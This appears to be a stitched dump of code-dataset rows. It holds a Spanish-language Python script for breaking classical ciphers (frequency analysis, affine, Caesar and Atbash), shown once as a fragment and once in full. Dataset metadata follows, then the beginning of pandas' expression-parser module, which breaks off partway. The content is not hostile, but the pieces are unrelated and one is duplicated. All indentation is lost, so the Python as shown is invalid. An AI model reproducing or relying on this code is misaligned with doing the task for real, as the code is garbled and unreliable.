r_std = [v for i, v in enumerate(estadisticas)]
r_mix_es = [v for i, v in enumerate(conv_estadisticas_es)]
r_mix_en = [v for i, v in enumerate(conv_estadisticas_en)]
# Tabla de posibles traducciones
translations = {r_std[i]: [r_mix_es[i]] for i in range(min(len(r_std), len(r_mix_es)))}
if english:
for i in range(min(len(r_std), len(r_mix_en))):
c = r_mix_en[i]
tr = r_std[i]
if c in translations:
translations[tr].append(c)
else:
translations[tr] = [c]
# Caracteres iguales juntos pueden ser LL, RR
rep = repetidos(t)
add_rep = True and (n_gram == 1)
if add_rep:
for d in rep:
translations[d].append('L')
translations[d].append('R')
# Caracteres diferentes repetidos juntos pueden ser CH
dup = analiza_repetidos(t, i=2)
add_dup = False and (n_gram == 1)
if add_dup:
for r in dup:
translations[r[0]].append('C')
translations[r[1]].append('H')
# Representación matriz
mat = representa_matrix(t, n = 20)
def unifica(translations):
for x in translations:
translations[x] = list(set(translations[x]))
return translations
translations = unifica(translations)
print()
print("[*] Mensaje:")
print(t)
print()
print("[*] Entropía: %f" % e)
print()
print("[*] Estadísticas:")
print(estadisticas)
print()
print("[*] Repetidos (RR, LL):")
print(rep)
print()
print("[*] Parejas repetidas:")
print(dup)
print()
print("[*] Matriz:")
print(mat)
print()
print("[*] Traducciones")
print(translations)
claves = 1
for i in translations:
v = translations[i]
claves *= len(v) if len(v) > 0 else 1
print()
print("[*] Claves posibles: %d" % claves)
# Resultados de la traducción
trans_res = []
gen_translations(translations, {})
'''
AFFINE ANALYSIS
C = ord('C') - ord('A')
D = ord('D') - ord('A')
L = ord('L') - ord('A')
A = ord('A') - ord('A')
# (a * L) + b = C
# (a * A) + b = D
# b = D - (a * A)
# (a * L) + D - (a * A) = C
# a * (L - A) = C - D
# a = (C - D) * (L - A)**(-1)
a = ( inverso(L - A, l) * (C - D) ) % l
# a = 7
b = ( D - (a * A) )
# b = 3
'''
stat = most_able(trans_res, KEYWORDS=KEYWORDS)
affine_values = dict(a=[], b=[])
print()
print('-[CODEBOOK BY CRYPTOANALYSIS]')
n_best = 3
for k in stat:
if n_best:
m = k.text
print("[%d] %s" % (stat[k], k))
broken = affine_break(m[0], m[1], t[0], t[1])
affine_values['a'].append(broken['a'])
affine_values['b'].append(broken['b'])
else:
break
n_best -= 1
affine_values['a'] = list(set(affine_values['a']))
affine_values['b'] = list(set(affine_values['b']))
affines = []
for a in affine_values['a']:
for b in affine_values['b']:
aux = decode_affine(t, a, b)
affines.append(Descifrado(aux, broken))
print()
print('-[AFFINE BY CRYPTOANALYSIS]')
n_best = 3
for x in most_able(affines, KEYWORDS=KEYWORDS):
if n_best:
print("%s" % x)
else:
break
n_best -= 1
others = True
if others:
'''
AFFINE ANALYSIS MANUAL
C = ord('C') - ord('A')
D = ord('D') - ord('A')
L = ord('L') - ord('A')
A = ord('A') - ord('A')
# (a * L) + b = C
# (a * A) + b = D
# b = D - (a * A)
# (a * L) + D - (a * A) = C
# a * (L - A) = C - D
# a = (C - D) * (L - A)**(-1)
a = ( inverso(L - A, l) * (C - D) ) % l
# a = 7
b = ( D - (a * A) )
# b = 3
'''
print()
print("-[AFFINE BRUTEFORCE]")
affines = []
for i in range(26):
for j in range(26):
aux = decode_affine(t, i, j)
# input("%d %d %s" % (i, j, aux))
affines.append(Descifrado(aux, dict(a=i, b=j)))
n_best = 3
for x in most_able(affines, KEYWORDS=KEYWORDS):
if n_best:
print("%s" % x)
else:
break
n_best -= 1
# CESAR ANALYSIS
from cesar import cesar
print()
print("-[CESAR BRUTEFORCE]")
cesars = []
for i in range(25):
cesars.append(Descifrado(cesar(i, t), dict(rot=i)))
stat = most_able(cesars, KEYWORDS=KEYWORDS)
n_best = 3
for k in stat:
if n_best:
print("%s" % (k))
else:
break
n_best -= 1
print()
print("-[ATBASH]")
letras = [chr(x + ord('A')) for x in range(ord('Z') - ord('A') + 1)]
atbash_code = letras[::-1]
def atbash(t):
res = ""
for x in t:
res += atbash_code[letras.index(x)]
return res
print("%s" % atbash(t))
| 28.474299
| 730
| 0.562485
|
import re
from affine import decode_affine, affine_break
estadisticas_castellano = {'A': 0.1203914356874436, 'B': 0.015130070791165134, 'C': 0.03719184102245509, 'D': 0.05437026585244542, 'E': 0.1386395633977034, 'F': 0.004934755557097172, 'G': 0.01092558720618012, 'H': 0.012658047516610746, 'I': 0.048772133465719646, 'J': 0.006582358140488471, 'K': 8.238012916956494e-05, 'L': 0.05551801306561237, 'M': 0.02788784162203377, 'N': 0.06781866708951004, 'O': 0.09582667220822723, 'P': 0.022245112473652295, 'Q': 0.02013110209127842, 'R': 0.06325617061234451, 'S': 0.07834783863652835, 'T': 0.03919621769909202, 'U': 0.048757887277968516, 'V': 0.011134324826707514, 'W': 0.00016847665514377192, 'X': 0.00025209558324821755, 'Y': 0.015759380650084517, 'Z': 0.004021760742090114}
estadisticas_castellano_esp = {' ': 1, 'A': 0.1203914356874436, 'B': 0.015130070791165134, 'C': 0.03719184102245509, 'D': 0.05437026585244542, 'E': 0.1386395633977034, 'F': 0.004934755557097172, 'G': 0.01092558720618012, 'H': 0.012658047516610746, 'I': 0.048772133465719646, 'J': 0.006582358140488471, 'K': 8.238012916956494e-05, 'L': 0.05551801306561237, 'M': 0.02788784162203377, 'N': 0.06781866708951004, 'O': 0.09582667220822723, 'P': 0.022245112473652295, 'Q': 0.02013110209127842, 'R': 0.06325617061234451, 'S': 0.07834783863652835, 'T': 0.03919621769909202, 'U': 0.048757887277968516, 'V': 0.011134324826707514, 'W': 0.00016847665514377192, 'X': 0.00025209558324821755, 'Y': 0.015759380650084517, 'Z': 0.004021760742090114}
estadisticas_ingles = {'A': 0.0831295411584481, 'B': 0.01738984496652256, 'C': 0.017155136950865266, 'D': 0.052443360917834525, 'E': 0.12285071813081565, 'F': 0.024581248091420035, 'G': 0.02449291711778557, 'H': 0.06476679361089449, 'I': 0.06393143497452282, 'J': 0.0006511254627912083, 'K': 0.009077900347519288, 'L': 0.04530117076396197, 'M': 0.022928197013403595, 'N': 0.06837322107728455, 'O': 0.0779066568745473, 'P': 0.013705181494913397, 'Q': 0.00058677003914324, 'R': 0.05933696247447866, 'S': 0.05987073392944122, 'T': 0.08989443186779629, 'U': 0.02559074493295679, 'V': 0.008983260018625218, 'W': 0.026715072040218356, 'X': 0.000682672239089232, 'Y': 0.019290222770715505, 'Z': 0.00036468073400515346}
with open('t.txt') as f:
t = f.read().replace(' ', '').replace('\n', '')
KEYWORDS = ['CRIP', 'CUANDO', 'EN', 'HA', 'HABIA', 'ERA', 'CONTRA', 'DESDE', 'SOLO', 'PERO', 'LE', 'SI', 'ESTA', 'AHORA', 'ALLI', 'SE', 'SEGUN', 'ANTE', 'SER', 'EL', 'POR', 'PARA', 'TAMBIEN', 'TODO', 'SUS', 'PORQUE', 'AQUI', 'YA', 'HACIA', 'A', 'CON', 'HAN', 'DEL', 'Y', 'AL', 'COMO', 'HASTA', 'QUE', 'O', 'UN', 'BAJO', 'LO', 'MAS', 'SU', 'LOS', 'SIN', 'NO', 'PUEDE', 'DOS', 'ENTRE', 'SOBRE', 'CIFR', 'MI', 'FUE', 'MUY', 'TRAS', 'LAS', 'LA', 'ES', 'SON', 'VEZ', 'ME', 'CABE', 'YO', 'HAY', 'ESTE', 'UNA', 'AÑOS', 'DE']
KEYWORDS_EN = list(set(['THE', 'IS', 'AND', 'WHO', 'HE', 'IT', 'WHERE', 'CRYPT', 'A']))
class Descifrado():
def __init__(self, text, key):
self.text = text
self.key = key
def __str__(self):
return "[%s] %s" % (self.key, self.text)
MAX = 5
def analiza_repetidos(t,i=2):
t = re.sub(r'[^A-Z]', '', t.upper())
res = {}
for j in range(len(t)):
ocur = t[j:j+i]
if len(ocur) < i:
continue
last = t[j:].find(ocur)
while last >= 0:
if ocur in res:
res[ocur].append(j+last)
else:
res[ocur] = [j+last]
n = t[j+last+1:].find(ocur)
if n >= 0:
last += n + 1
else:
last = -1
for x in res:
val = list(set(res[x]))
val.sort()
res[x] = val
return res
def calcula_distancias(v):
dist = []
for x in range(len(v))[1:]:
dist.append(v[x] - v[x-1])
return dist
def divisores(x):
res = []
for i in range(int(x/2))[2:]:
if x % i == 0:
res.append(i)
return res
def analisis_estadistico(txt):
txt = re.sub(r'[^A-Z]', '', txt.upper())
d = {chr(c + ord('A')): 0 for c in range(ord('Z') - ord('A') + 1)}
for x in txt:
if x in d:
d[x] += 1
else:
d[x] = 1
return {x: float(d[x])/len(txt) for x in d}
def gen_keys(cs, n, key):
if len(key) == len(cs):
return [key]
keys = []
for c in cs[n]:
keys += gen_keys(cs, n+1, key + c)
return keys
from math import gcd
def comun_divisor(values):
res = values[0]
for v in values[1:]:
aux = gcd(res, v)
if aux <= 2:
return res
res = aux
return res
def repetidos(t):
res = {}
for x in range(len(t) - 1):
if t[x] == t[x+1]:
c = t[x:x+1]
if c in res:
res[c].append(x)
else:
res[c] = [x]
return res
def representa_matrix(t, n=10):
res = ""
for i in range(len(t)):
if i % n == 0 and i > 0:
res += "\n"
res += "%c " % t[i]
return res
def translate(t, translations, n=1):
res = ""
while len(t):
c = t[:n]
t = t[n:]
res += translations.get(c, " ")
return res
def gen_translations(translations, translation):
translation_aux = {k: translation[k] for k in translation}
if len(translations) == 0:
r = translate(t, translation, n=n_gram)
trans_res.append(Descifrado(r, translation))
return
ts = translations.keys()
for i in ts:
ts_values = translations[i]
for j in ts_values:
translation_aux[i] = j
next = {k: translations[k] for k in translations if k!=i}
gen_translations(next, translation_aux)
break
english = False
def most_able(candidates, KEYWORDS=[]):
res = {}
for c in candidates:
kws = 0
for keyword in KEYWORDS:
if keyword in c.text:
kws += 1
if english:
for keyword in KEYWORDS_EN:
if keyword in c.text:
kws += 1
res[c] = kws
return {x[0]: x[1] for x in sorted(res.items(), key=lambda x: (x[1],x[0].text))[::-1]}
from entro import entropy
e = entropy(t)
multigram = False
if multigram:
print("ANÁLISIS POLIALFABÉTICO")
n_gram = int(input("Ngram > "))
else:
print("- ANÁLISIS MONOALFABÉTICO:")
n_gram = 1
ar = analiza_repetidos(t, i=n_gram)
d = {x: len(ar[x]) for x in ar}
estadisticas = {x[0]: x[1] for x in sorted(d.items(), key=lambda x: (x[1],x[0]))[::-1]}
conv_estadisticas_es = {x[0]: x[1] for x in sorted(estadisticas_castellano.items(), key=lambda x: (x[1],x[0]))[::-1]}
conv_estadisticas_en = {x[0]: x[1] for x in sorted(estadisticas_ingles.items(), key=lambda x: (x[1],x[0]))[::-1]}
r_std = [v for i, v in enumerate(estadisticas)]
r_mix_es = [v for i, v in enumerate(conv_estadisticas_es)]
r_mix_en = [v for i, v in enumerate(conv_estadisticas_en)]
translations = {r_std[i]: [r_mix_es[i]] for i in range(min(len(r_std), len(r_mix_es)))}
if english:
for i in range(min(len(r_std), len(r_mix_en))):
c = r_mix_en[i]
tr = r_std[i]
if c in translations:
translations[tr].append(c)
else:
translations[tr] = [c]
rep = repetidos(t)
add_rep = True and (n_gram == 1)
if add_rep:
for d in rep:
translations[d].append('L')
translations[d].append('R')
dup = analiza_repetidos(t, i=2)
add_dup = False and (n_gram == 1)
if add_dup:
for r in dup:
translations[r[0]].append('C')
translations[r[1]].append('H')
mat = representa_matrix(t, n = 20)
def unifica(translations):
for x in translations:
translations[x] = list(set(translations[x]))
return translations
translations = unifica(translations)
print()
print("[*] Mensaje:")
print(t)
print()
print("[*] Entropía: %f" % e)
print()
print("[*] Estadísticas:")
print(estadisticas)
print()
print("[*] Repetidos (RR, LL):")
print(rep)
print()
print("[*] Parejas repetidas:")
print(dup)
print()
print("[*] Matriz:")
print(mat)
print()
print("[*] Traducciones")
print(translations)
claves = 1
for i in translations:
v = translations[i]
claves *= len(v) if len(v) > 0 else 1
print()
print("[*] Claves posibles: %d" % claves)
trans_res = []
gen_translations(translations, {})
stat = most_able(trans_res, KEYWORDS=KEYWORDS)
affine_values = dict(a=[], b=[])
print()
print('-[CODEBOOK BY CRYPTOANALYSIS]')
n_best = 3
for k in stat:
if n_best:
m = k.text
print("[%d] %s" % (stat[k], k))
broken = affine_break(m[0], m[1], t[0], t[1])
affine_values['a'].append(broken['a'])
affine_values['b'].append(broken['b'])
else:
break
n_best -= 1
affine_values['a'] = list(set(affine_values['a']))
affine_values['b'] = list(set(affine_values['b']))
affines = []
for a in affine_values['a']:
for b in affine_values['b']:
aux = decode_affine(t, a, b)
affines.append(Descifrado(aux, broken))
print()
print('-[AFFINE BY CRYPTOANALYSIS]')
n_best = 3
for x in most_able(affines, KEYWORDS=KEYWORDS):
if n_best:
print("%s" % x)
else:
break
n_best -= 1
others = True
if others:
print()
print("-[AFFINE BRUTEFORCE]")
affines = []
for i in range(26):
for j in range(26):
aux = decode_affine(t, i, j)
affines.append(Descifrado(aux, dict(a=i, b=j)))
n_best = 3
for x in most_able(affines, KEYWORDS=KEYWORDS):
if n_best:
print("%s" % x)
else:
break
n_best -= 1
from cesar import cesar
print()
print("-[CESAR BRUTEFORCE]")
cesars = []
for i in range(25):
cesars.append(Descifrado(cesar(i, t), dict(rot=i)))
stat = most_able(cesars, KEYWORDS=KEYWORDS)
n_best = 3
for k in stat:
if n_best:
print("%s" % (k))
else:
break
n_best -= 1
print()
print("-[ATBASH]")
letras = [chr(x + ord('A')) for x in range(ord('Z') - ord('A') + 1)]
atbash_code = letras[::-1]
def atbash(t):
res = ""
for x in t:
res += atbash_code[letras.index(x)]
return res
print("%s" % atbash(t))
| true
| true
|
1c40dc99308567bada224c8e4e4b3fd6b5c6906b
| 22,556
|
py
|
Python
|
pandas/computation/expr.py
|
clarkfitzg/pandas
|
a71ede374a019ea40321d8c1cfd13258b45ff58d
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null |
pandas/computation/expr.py
|
clarkfitzg/pandas
|
a71ede374a019ea40321d8c1cfd13258b45ff58d
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null |
pandas/computation/expr.py
|
clarkfitzg/pandas
|
a71ede374a019ea40321d8c1cfd13258b45ff58d
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null |
""":func:`~pandas.eval` parsers
"""
import ast
import operator
import sys
import inspect
import tokenize
import datetime
from functools import partial
import pandas as pd
from pandas import compat
from pandas.compat import StringIO, lmap, zip, reduce, string_types
from pandas.core.base import StringMixin
from pandas.core import common as com
from pandas.tools.util import compose
from pandas.computation.ops import (_cmp_ops_syms, _bool_ops_syms,
_arith_ops_syms, _unary_ops_syms, is_term)
from pandas.computation.ops import _reductions, _mathops, _LOCAL_TAG
from pandas.computation.ops import Op, BinOp, UnaryOp, Term, Constant, Div
from pandas.computation.ops import UndefinedVariableError
from pandas.computation.scope import Scope, _ensure_scope
def tokenize_string(source):
"""Tokenize a Python source code string.
Parameters
----------
source : str
A Python source code string
"""
line_reader = StringIO(source).readline
for toknum, tokval, _, _, _ in tokenize.generate_tokens(line_reader):
yield toknum, tokval
def _rewrite_assign(tok):
"""Rewrite the assignment operator for PyTables expressions that use ``=``
as a substitute for ``==``.
Parameters
----------
tok : tuple of int, str
ints correspond to the all caps constants in the tokenize module
Returns
-------
t : tuple of int, str
Either the input or token or the replacement values
"""
toknum, tokval = tok
return toknum, '==' if tokval == '=' else tokval
def _replace_booleans(tok):
"""Replace ``&`` with ``and`` and ``|`` with ``or`` so that bitwise
precedence is changed to boolean precedence.
Parameters
----------
tok : tuple of int, str
ints correspond to the all caps constants in the tokenize module
Returns
-------
t : tuple of int, str
Either the input or token or the replacement values
"""
toknum, tokval = tok
if toknum == tokenize.OP:
if tokval == '&':
return tokenize.NAME, 'and'
elif tokval == '|':
return tokenize.NAME, 'or'
return toknum, tokval
return toknum, tokval
def _replace_locals(tok):
"""Replace local variables with a syntactically valid name.
Parameters
----------
tok : tuple of int, str
ints correspond to the all caps constants in the tokenize module
Returns
-------
t : tuple of int, str
Either the input or token or the replacement values
Notes
-----
This is somewhat of a hack in that we rewrite a string such as ``'@a'`` as
``'__pd_eval_local_a'`` by telling the tokenizer that ``__pd_eval_local_``
is a ``tokenize.OP`` and to replace the ``'@'`` symbol with it.
"""
toknum, tokval = tok
if toknum == tokenize.OP and tokval == '@':
return tokenize.OP, _LOCAL_TAG
return toknum, tokval
def _preparse(source, f=compose(_replace_locals, _replace_booleans,
_rewrite_assign)):
"""Compose a collection of tokenization functions
Parameters
----------
source : str
A Python source code string
f : callable
This takes a tuple of (toknum, tokval) as its argument and returns a
tuple with the same structure but possibly different elements. Defaults
to the composition of ``_rewrite_assign``, ``_replace_booleans``, and
``_replace_locals``.
Returns
-------
s : str
Valid Python source code
Notes
-----
The `f` parameter can be any callable that takes *and* returns input of the
form ``(toknum, tokval)``, where ``toknum`` is one of the constants from
the ``tokenize`` module and ``tokval`` is a string.
"""
assert callable(f), 'f must be callable'
return tokenize.untokenize(lmap(f, tokenize_string(source)))
def _is_type(t):
"""Factory for a type checking function of type ``t`` or tuple of types."""
return lambda x: isinstance(x.value, t)
_is_list = _is_type(list)
_is_str = _is_type(string_types)
# partition all AST nodes
_all_nodes = frozenset(filter(lambda x: isinstance(x, type) and
issubclass(x, ast.AST),
(getattr(ast, node) for node in dir(ast))))
def _filter_nodes(superclass, all_nodes=_all_nodes):
"""Filter out AST nodes that are subclasses of ``superclass``."""
node_names = (node.__name__ for node in all_nodes
if issubclass(node, superclass))
return frozenset(node_names)
_all_node_names = frozenset(map(lambda x: x.__name__, _all_nodes))
_mod_nodes = _filter_nodes(ast.mod)
_stmt_nodes = _filter_nodes(ast.stmt)
_expr_nodes = _filter_nodes(ast.expr)
_expr_context_nodes = _filter_nodes(ast.expr_context)
_slice_nodes = _filter_nodes(ast.slice)
_boolop_nodes = _filter_nodes(ast.boolop)
_operator_nodes = _filter_nodes(ast.operator)
_unary_op_nodes = _filter_nodes(ast.unaryop)
_cmp_op_nodes = _filter_nodes(ast.cmpop)
_comprehension_nodes = _filter_nodes(ast.comprehension)
_handler_nodes = _filter_nodes(ast.excepthandler)
_arguments_nodes = _filter_nodes(ast.arguments)
_keyword_nodes = _filter_nodes(ast.keyword)
_alias_nodes = _filter_nodes(ast.alias)
# nodes that we don't support directly but are needed for parsing
_hacked_nodes = frozenset(['Assign', 'Module', 'Expr'])
_unsupported_expr_nodes = frozenset(['Yield', 'GeneratorExp', 'IfExp',
'DictComp', 'SetComp', 'Repr', 'Lambda',
'Set', 'AST', 'Is', 'IsNot'])
# these nodes are low priority or won't ever be supported (e.g., AST)
_unsupported_nodes = ((_stmt_nodes | _mod_nodes | _handler_nodes |
_arguments_nodes | _keyword_nodes | _alias_nodes |
_expr_context_nodes | _unsupported_expr_nodes) -
_hacked_nodes)
# we're adding a different assignment in some cases to be equality comparison
# and we don't want `stmt` and friends in their so get only the class whose
# names are capitalized
_base_supported_nodes = (_all_node_names - _unsupported_nodes) | _hacked_nodes
_msg = 'cannot both support and not support {0}'.format(_unsupported_nodes &
_base_supported_nodes)
assert not _unsupported_nodes & _base_supported_nodes, _msg
def _node_not_implemented(node_name, cls):
"""Return a function that raises a NotImplementedError with a passed node
name.
"""
def f(self, *args, **kwargs):
raise NotImplementedError("{0!r} nodes are not "
"implemented".format(node_name))
return f
def disallow(nodes):
"""Decorator to disallow certain nodes from parsing. Raises a
NotImplementedError instead.
Returns
-------
disallowed : callable
"""
def disallowed(cls):
cls.unsupported_nodes = ()
for node in nodes:
new_method = _node_not_implemented(node, cls)
name = 'visit_{0}'.format(node)
cls.unsupported_nodes += (name,)
setattr(cls, name, new_method)
return cls
return disallowed
def _op_maker(op_class, op_symbol):
"""Return a function to create an op class with its symbol already passed.
Returns
-------
f : callable
"""
def f(self, node, *args, **kwargs):
"""Return a partial function with an Op subclass with an operator
already passed.
Returns
-------
f : callable
"""
return partial(op_class, op_symbol, *args, **kwargs)
return f
_op_classes = {'binary': BinOp, 'unary': UnaryOp}
def add_ops(op_classes):
"""Decorator to add default implementation of ops."""
def f(cls):
for op_attr_name, op_class in compat.iteritems(op_classes):
ops = getattr(cls, '{0}_ops'.format(op_attr_name))
ops_map = getattr(cls, '{0}_op_nodes_map'.format(op_attr_name))
for op in ops:
op_node = ops_map[op]
if op_node is not None:
made_op = _op_maker(op_class, op)
setattr(cls, 'visit_{0}'.format(op_node), made_op)
return cls
return f
@disallow(_unsupported_nodes)
@add_ops(_op_classes)
class BaseExprVisitor(ast.NodeVisitor):
"""Custom ast walker. Parsers of other engines should subclass this class
if necessary.
Parameters
----------
env : Scope
engine : str
parser : str
preparser : callable
"""
const_type = Constant
term_type = Term
binary_ops = _cmp_ops_syms + _bool_ops_syms + _arith_ops_syms
binary_op_nodes = ('Gt', 'Lt', 'GtE', 'LtE', 'Eq', 'NotEq', 'In', 'NotIn',
'BitAnd', 'BitOr', 'And', 'Or', 'Add', 'Sub', 'Mult',
None, 'Pow', 'FloorDiv', 'Mod')
binary_op_nodes_map = dict(zip(binary_ops, binary_op_nodes))
unary_ops = _unary_ops_syms
unary_op_nodes = 'UAdd', 'USub', 'Invert', 'Not'
unary_op_nodes_map = dict(zip(unary_ops, unary_op_nodes))
rewrite_map = {
ast.Eq: ast.In,
ast.NotEq: ast.NotIn,
ast.In: ast.In,
ast.NotIn: ast.NotIn
}
def __init__(self, env, engine, parser, preparser=_preparse):
self.env = env
self.engine = engine
self.parser = parser
self.preparser = preparser
self.assigner = None
def visit(self, node, **kwargs):
if isinstance(node, string_types):
clean = self.preparser(node)
node = ast.fix_missing_locations(ast.parse(clean))
method = 'visit_' + node.__class__.__name__
visitor = getattr(self, method)
return visitor(node, **kwargs)
def visit_Module(self, node, **kwargs):
if len(node.body) != 1:
raise SyntaxError('only a single expression is allowed')
expr = node.body[0]
return self.visit(expr, **kwargs)
def visit_Expr(self, node, **kwargs):
return self.visit(node.value, **kwargs)
def _rewrite_membership_op(self, node, left, right):
# the kind of the operator (is actually an instance)
op_instance = node.op
op_type = type(op_instance)
# must be two terms and the comparison operator must be ==/!=/in/not in
if is_term(left) and is_term(right) and op_type in self.rewrite_map:
left_list, right_list = map(_is_list, (left, right))
left_str, right_str = map(_is_str, (left, right))
# if there are any strings or lists in the expression
if left_list or right_list or left_str or right_str:
op_instance = self.rewrite_map[op_type]()
# pop the string variable out of locals and replace it with a list
# of one string, kind of a hack
if right_str:
self.env.remove_tmp(right.name)
name = self.env.add_tmp([right.value])
right = self.term_type(name, self.env)
if left_str:
self.env.remove_tmp(left.name)
name = self.env.add_tmp([left.value])
left = self.term_type(name, self.env)
op = self.visit(op_instance)
return op, op_instance, left, right
def _possibly_transform_eq_ne(self, node, left=None, right=None):
if left is None:
left = self.visit(node.left, side='left')
if right is None:
right = self.visit(node.right, side='right')
op, op_class, left, right = self._rewrite_membership_op(node, left,
right)
return op, op_class, left, right
def _possibly_eval(self, binop, eval_in_python):
# eval `in` and `not in` (for now) in "partial" python space
# things that can be evaluated in "eval" space will be turned into
# temporary variables. for example,
# [1,2] in a + 2 * b
# in that case a + 2 * b will be evaluated using numexpr, and the "in"
# call will be evaluated using isin (in python space)
return binop.evaluate(self.env, self.engine, self.parser,
self.term_type, eval_in_python)
def _possibly_evaluate_binop(self, op, op_class, lhs, rhs,
eval_in_python=('in', 'not in'),
maybe_eval_in_python=('==', '!=', '<', '>',
'<=', '>=')):
res = op(lhs, rhs)
if self.engine != 'pytables':
if (res.op in _cmp_ops_syms
and getattr(lhs, 'is_datetime', False)
or getattr(rhs, 'is_datetime', False)):
# all date ops must be done in python bc numexpr doesn't work
# well with NaT
return self._possibly_eval(res, self.binary_ops)
if res.op in eval_in_python:
# "in"/"not in" ops are always evaluated in python
return self._possibly_eval(res, eval_in_python)
elif self.engine != 'pytables':
if (getattr(lhs, 'return_type', None) == object
or getattr(rhs, 'return_type', None) == object):
# evaluate "==" and "!=" in python if either of our operands
# has an object return type
return self._possibly_eval(res, eval_in_python +
maybe_eval_in_python)
return res
def visit_BinOp(self, node, **kwargs):
op, op_class, left, right = self._possibly_transform_eq_ne(node)
return self._possibly_evaluate_binop(op, op_class, left, right)
def visit_Div(self, node, **kwargs):
truediv = self.env.scope['truediv']
return lambda lhs, rhs: Div(lhs, rhs, truediv)
def visit_UnaryOp(self, node, **kwargs):
op = self.visit(node.op)
operand = self.visit(node.operand)
return op(operand)
def visit_Name(self, node, **kwargs):
return self.term_type(node.id, self.env, **kwargs)
def visit_NameConstant(self, node, **kwargs):
return self.const_type(node.value, self.env)
def visit_Num(self, node, **kwargs):
return self.const_type(node.n, self.env)
def visit_Str(self, node, **kwargs):
name = self.env.add_tmp(node.s)
return self.term_type(name, self.env)
def visit_List(self, node, **kwargs):
name = self.env.add_tmp([self.visit(e).value for e in node.elts])
return self.term_type(name, self.env)
visit_Tuple = visit_List
def visit_Index(self, node, **kwargs):
""" df.index[4] """
return self.visit(node.value)
def visit_Subscript(self, node, **kwargs):
value = self.visit(node.value)
slobj = self.visit(node.slice)
result = pd.eval(slobj, local_dict=self.env, engine=self.engine,
parser=self.parser)
try:
# a Term instance
v = value.value[result]
except AttributeError:
# an Op instance
lhs = pd.eval(value, local_dict=self.env, engine=self.engine,
parser=self.parser)
v = lhs[result]
name = self.env.add_tmp(v)
return self.term_type(name, env=self.env)
def visit_Slice(self, node, **kwargs):
""" df.index[slice(4,6)] """
lower = node.lower
if lower is not None:
lower = self.visit(lower).value
upper = node.upper
if upper is not None:
upper = self.visit(upper).value
step = node.step
if step is not None:
step = self.visit(step).value
return slice(lower, upper, step)
def visit_Assign(self, node, **kwargs):
"""
support a single assignment node, like
c = a + b
set the assigner at the top level, must be a Name node which
might or might not exist in the resolvers
"""
if len(node.targets) != 1:
raise SyntaxError('can only assign a single expression')
if not isinstance(node.targets[0], ast.Name):
raise SyntaxError('left hand side of an assignment must be a '
'single name')
if self.env.target is None:
raise ValueError('cannot assign without a target object')
try:
assigner = self.visit(node.targets[0], **kwargs)
except UndefinedVariableError:
assigner = node.targets[0].id
self.assigner = getattr(assigner, 'name', assigner)
if self.assigner is None:
raise SyntaxError('left hand side of an assignment must be a '
'single resolvable name')
return self.visit(node.value, **kwargs)
def visit_Attribute(self, node, **kwargs):
attr = node.attr
value = node.value
ctx = node.ctx
if isinstance(ctx, ast.Load):
# resolve the value
resolved = self.visit(value).value
try:
v = getattr(resolved, attr)
name = self.env.add_tmp(v)
return self.term_type(name, self.env)
except AttributeError:
# something like datetime.datetime where scope is overridden
if isinstance(value, ast.Name) and value.id == attr:
return resolved
raise ValueError("Invalid Attribute context {0}".format(ctx.__name__))
def visit_Call(self, node, side=None, **kwargs):
# this can happen with: datetime.datetime
if isinstance(node.func, ast.Attribute):
res = self.visit_Attribute(node.func)
elif not isinstance(node.func, ast.Name):
raise TypeError("Only named functions are supported")
else:
res = self.visit(node.func)
if res is None:
raise ValueError("Invalid function call {0}".format(node.func.id))
if hasattr(res, 'value'):
res = res.value
args = [self.visit(targ).value for targ in node.args]
if node.starargs is not None:
args += self.visit(node.starargs).value
keywords = {}
for key in node.keywords:
if not isinstance(key, ast.keyword):
raise ValueError("keyword error in function call "
"'{0}'".format(node.func.id))
keywords[key.arg] = self.visit(key.value).value
if node.kwargs is not None:
keywords.update(self.visit(node.kwargs).value)
return self.const_type(res(*args, **keywords), self.env)
def translate_In(self, op):
return op
def visit_Compare(self, node, **kwargs):
ops = node.ops
comps = node.comparators
# base case: we have something like a CMP b
if len(comps) == 1:
op = self.translate_In(ops[0])
binop = ast.BinOp(op=op, left=node.left, right=comps[0])
return self.visit(binop)
# recursive case: we have a chained comparison, a CMP b CMP c, etc.
left = node.left
values = []
for op, comp in zip(ops, comps):
new_node = self.visit(ast.Compare(comparators=[comp], left=left,
ops=[self.translate_In(op)]))
left = comp
values.append(new_node)
return self.visit(ast.BoolOp(op=ast.And(), values=values))
def _try_visit_binop(self, bop):
if isinstance(bop, (Op, Term)):
return bop
return self.visit(bop)
def visit_BoolOp(self, node, **kwargs):
def visitor(x, y):
lhs = self._try_visit_binop(x)
rhs = self._try_visit_binop(y)
op, op_class, lhs, rhs = self._possibly_transform_eq_ne(node, lhs,
rhs)
return self._possibly_evaluate_binop(op, node.op, lhs, rhs)
operands = node.values
return reduce(visitor, operands)
_python_not_supported = frozenset(['Dict', 'Call', 'BoolOp', 'In', 'NotIn'])
_numexpr_supported_calls = frozenset(_reductions + _mathops)
@disallow((_unsupported_nodes | _python_not_supported) -
(_boolop_nodes | frozenset(['BoolOp', 'Attribute', 'In', 'NotIn',
'Tuple'])))
class PandasExprVisitor(BaseExprVisitor):
def __init__(self, env, engine, parser,
preparser=partial(_preparse, f=compose(_replace_locals,
_replace_booleans))):
super(PandasExprVisitor, self).__init__(env, engine, parser, preparser)
@disallow(_unsupported_nodes | _python_not_supported | frozenset(['Not']))
class PythonExprVisitor(BaseExprVisitor):
def __init__(self, env, engine, parser, preparser=lambda x: x):
super(PythonExprVisitor, self).__init__(env, engine, parser,
preparser=preparser)
class Expr(StringMixin):
"""Object encapsulating an expression.
Parameters
----------
expr : str
engine : str, optional, default 'numexpr'
parser : str, optional, default 'pandas'
env : Scope, optional, default None
truediv : bool, optional, default True
level : int, optional, default 2
"""
def __init__(self, expr, engine='numexpr', parser='pandas', env=None,
truediv=True, level=0):
self.expr = expr
self.env = env or Scope(level=level + 1)
self.engine = engine
self.parser = parser
self.env.scope['truediv'] = truediv
self._visitor = _parsers[parser](self.env, self.engine, self.parser)
self.terms = self.parse()
@property
def assigner(self):
return getattr(self._visitor, 'assigner', None)
def __call__(self):
return self.terms(self.env)
def __unicode__(self):
return com.pprint_thing(self.terms)
def __len__(self):
return len(self.expr)
def parse(self):
"""Parse an expression"""
return self._visitor.visit(self.expr)
@property
def names(self):
